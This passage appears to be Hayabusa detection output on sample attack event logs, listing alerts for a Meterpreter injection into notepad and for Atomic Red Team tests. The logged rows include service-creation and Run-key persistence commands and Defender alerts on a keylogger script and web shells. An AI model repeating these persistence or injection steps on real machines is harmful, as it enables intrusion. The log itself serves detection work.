365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\notepad.exe"" | LID: 0x135ca | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\system32\notepad.exe | Tgt Process: C:\Windows\system32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1632 | Src PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00 | Tgt PID: 2328 | Tgt PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,LatMov | Exec,Rundll32 Without Parameters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-04 05:39:31.707 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:8181 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 2328 | PGUID: 365ABB72-1282-5D1D-0000-0010DD401B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T | Severity: Severe | Type: Backdoor | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl | Severity: Severe | Type: Trojan | User: MSEDGEWIN10\IEUser | Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,,Windows Defender Alert,Threat: HackTool:JS/Jsprat | Severity: High | Type: Tool | User: MSEDGEWIN10\IEUser | Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx 2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA21C70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5828 | PGUID: 747F3D96-D6EB-5D31-0000-0010E0252500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 3764 | PGUID: 747F3D96-D6ED-5D31-0000-0010C88A2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\phvj2yfb\phvj2yfb.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:43:46.623 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4216 | PGUID: 747F3D96-D738-5D31-0000-001046A02600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" | LID: 0x50951 | PID: 1700 | PGUID: 747F3D96-D738-5D31-0000-001098A22600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,Persis | PrivEsc,New Service Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2556 | PGUID: 747F3D96-D738-5D31-0000-001056A62600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe start AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D738-5D31-0000-0010D8AA2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6188 | PGUID: 747F3D96-D738-5D31-0000-00105CAC2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D739-5D31-0000-00104CB72600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe stop AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D739-5D31-0000-0010B6B92600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,../hayabusa-rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4744 | PGUID: 747F3D96-D739-5D31-0000-0010E4BB2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc.exe delete AtomicTestService | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D739-5D31-0000-001046BE2600 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 